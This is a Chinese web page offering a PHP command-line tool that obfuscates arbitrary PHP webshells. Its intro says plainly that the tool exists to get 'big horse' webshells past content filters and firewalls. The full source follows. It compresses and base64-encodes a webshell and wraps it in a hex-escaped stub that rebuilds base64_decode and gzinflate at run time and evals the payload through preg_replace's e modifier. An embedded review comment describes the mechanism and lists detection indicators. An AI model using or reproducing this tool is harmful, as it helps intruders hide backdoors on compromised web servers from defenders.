lostwolf写的
这不是webshell,只是个webshell免杀工具
切勿当作webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式!
如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意php webshell 通过此工具编码之后可以绕过国内一些bt的防火墙
<BR><?php <BR>/*
Title: PHP shell nokill T00L
Blog: exploit-db.blogcn.com

What the script on this page does (CLI only):
  - Takes one argument, the path of a PHP file ($argv[1]). With no argument it
    prints the usage text through baner() and exits.
  - Calls No_kill_c0de(), which writes 'nokill_' followed by the input name with
    file_put_contents(), then prints a "Saved to" path built from
    dirname(__FILE__).
  - No_kill_c0de() strips comments and whitespace with php_strip_whitespace(),
    trims the PHP tag characters from both ends, compresses the result with
    gzdeflate() and base64-encodes it. The encoded text is embedded in the
    generated file as the string $enfile, followed by a fixed stub that is
    stored in this script as hex escapes.
  - The stub rebuilds the names base64_decode and gzinflate at run time by
    calling str_replace() to delete a filler character ('f' and 'X') from a
    literal, then calls preg_replace() with the e modifier so that the
    replacement string, an eval of the inflated and decoded $enfile, is
    executed.

Review notes:
  - error_reporting(0) and the @ on ini_set() hide every error the script
    raises.
  - The e modifier of preg_replace() was deprecated in PHP 5.5 and removed in
    PHP 7.0, so the generated stub depends on a PHP 5.x interpreter.
  - The names eval, base64_decode and gzinflate never appear literally in the
    generated file, so a content filter that matches only those strings will
    not flag it. Indicators that are visible in this listing: preg_replace()
    with an e modifier, str_replace() calls that strip one filler character
    from a literal, a long base64 literal assigned to $enfile, and output file
    names that start with nokill_.
  - Only the text of the file changes; the stub evals the original code, so
    controls that inspect the decoded code or the behaviour of the PHP process
    should see the same payload as before encoding.
*/ <BR>error_reporting(0); <BR>@ini_set('memory_limit','-1'); <BR>set_time_limit(0); <BR>$toolname="$argv[0]"; <BR>if ($argc<2) { <BR>baner($toolname); <BR>die; <BR>} <BR>$input_file= trim($argv[1]); <BR>$output_file='nokill_'.$input_file; <BR>if (file_exists($input_file)) { <BR>No_kill_c0de($input_file,$output_file); <BR>echo "PHP shell nokill T00L\r\n"; <BR>echo "Blog: exploit-db.blogcn.com\r\n"; <BR>echo "Input: {$input_file}\r\n"; <BR>$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file; <BR>echo "[+] Generate success!\r\n"; <BR>echo "Saved to {$file_full_path}"."\r\n"; <BR>} else { <BR>echo "PHP shell nokill T00L\r\n"; <BR>echo "Blog: exploit-db.blogcn.com\r\n"; <BR>die("[-] Failed ! The File $input_file does not exist"); <BR>} <BR>function No_kill_c0de($input_file,$output_file){ <BR>$no_whitespace=php_strip_whitespace($input_file); <BR>$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>'); <BR>$enfile=base64_encode(gzdeflate($no_php_tag)); <BR>$shellcode="\x3c\x3f\x70\x68\x70\xd\xa"; <BR>$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa"; 
<BR>$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa"; <BR>$shellcode.="\x3f\x3e"; <BR>file_put_contents("$output_file",$shellcode); <BR>} <BR>function baner($toolname){ <BR>echo "PHP shell nokill T00L\r\n"; <BR>echo "Blog: exploit-db.blogcn.com\r\n"; <BR>echo "Usage: {$toolname} phpwebshell\r\n"; <BR>} <BR>?> <BR>